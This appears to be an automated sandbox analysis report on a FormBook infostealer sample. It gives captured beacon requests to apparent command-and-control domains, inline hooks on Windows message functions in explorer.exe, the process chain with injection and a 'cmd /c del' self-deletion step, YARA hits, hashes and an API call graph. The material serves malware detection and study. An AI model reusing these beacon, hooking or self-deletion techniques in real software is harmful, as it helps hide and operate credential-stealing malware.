                          Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49693 | Destination IP: 2.57.90.16 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                          Timestamp: Mar 14, 2023 07:26:47.573074102 CET | kBytes transferred: 20 | Direction: OUT | Data:
                          GET /nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp HTTP/1.1
                          Host: www.linnus.shop
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Timestamp: Mar 14, 2023 07:26:47.610924959 CET | kBytes transferred: 20 | Direction: IN | Data:
                          HTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Tue, 14 Mar 2023 06:26:47 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49694 | Destination IP: 66.113.136.229 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                          Timestamp: Mar 14, 2023 07:27:08.555535078 CET | kBytes transferred: 22 | Direction: OUT | Data:
                          GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3 HTTP/1.1
                          Host: www.incentiveexcellence.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Timestamp: Mar 14, 2023 07:27:09.016885996 CET | kBytes transferred: 22 | Direction: IN | Data:
                          HTTP/1.1 404 Not Found
                          Date: Tue, 14 Mar 2023 12:03:40 GMT
                          Server: Apache/1.3.19 (Unix) FrontPage/5.0.2.2510
                          Connection: close
                          Transfer-Encoding: chunked
                          Content-Type: text/html
                          Data Ascii: 148<html><head><title>This domain is registered - incentiveexcellence.com</title></head><frameset rows="35,*"><frame scrolling="no" frameborder="0" src="http://redirect.aaaq.com/header.html"><frame scrolling="auto" frameborder="0" src="http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.com"></frameset></html>
                          Timestamp: Mar 14, 2023 07:27:09.017154932 CET | kBytes transferred: 22 | Direction: IN | Data:
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Code Manipulations

| Function Name | Hook Type | Active in Processes |
| --- | --- | --- |
| PeekMessageA | INLINE | explorer.exe |
| PeekMessageW | INLINE | explorer.exe |
| GetMessageW | INLINE | explorer.exe |
| GetMessageA | INLINE | explorer.exe |

| Function Name | Hook Type | New Data |
| --- | --- | --- |
| PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE7 |
| PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE7 |
| GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE7 |
| GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE7 |

                          Target ID:0
                          Start time:07:25:14
                          Start date:14/03/2023
                          Path:C:\Users\user\Desktop\YSpCB8DEek.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\YSpCB8DEek.exe
                          Imagebase:0x400000
                          File size:271045 bytes
                          MD5 hash:D927DE8CECB8523B956D2BB2098D20EF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Target ID:1
                          Start time:07:25:14
                          Start date:14/03/2023
                          Path:C:\Users\user\AppData\Local\Temp\afhjjq.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq
                          Imagebase:0x1320000
                          File size:61440 bytes
                          MD5 hash:6C148CA1A207DD5BE97C1726A9F4BABF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 30%, ReversingLabs
                          Reputation:low

                          Target ID:2
                          Start time:07:25:15
                          Start date:14/03/2023
                          Path:C:\Users\user\AppData\Local\Temp\afhjjq.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\afhjjq.exe
                          Imagebase:0x1320000
                          File size:61440 bytes
                          MD5 hash:6C148CA1A207DD5BE97C1726A9F4BABF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Target ID:3
                          Start time:07:25:21
                          Start date:14/03/2023
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff69bc80000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:4
                          Start time:07:25:35
                          Start date:14/03/2023
                          Path:C:\Windows\SysWOW64\control.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\control.exe
                          Imagebase:0xb80000
                          File size:114688 bytes
                          MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Target ID:5
                          Start time:07:25:40
                          Start date:14/03/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe"
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:6
                          Start time:07:25:40
                          Start date:14/03/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7fcd70000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                            Execution Graph

                            Execution Coverage:15.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.4%
                            Total number of Nodes:1385
                            Total number of Limit Nodes:25
4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 
3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 
3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 
3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 
EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e 
GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 
4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 
4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 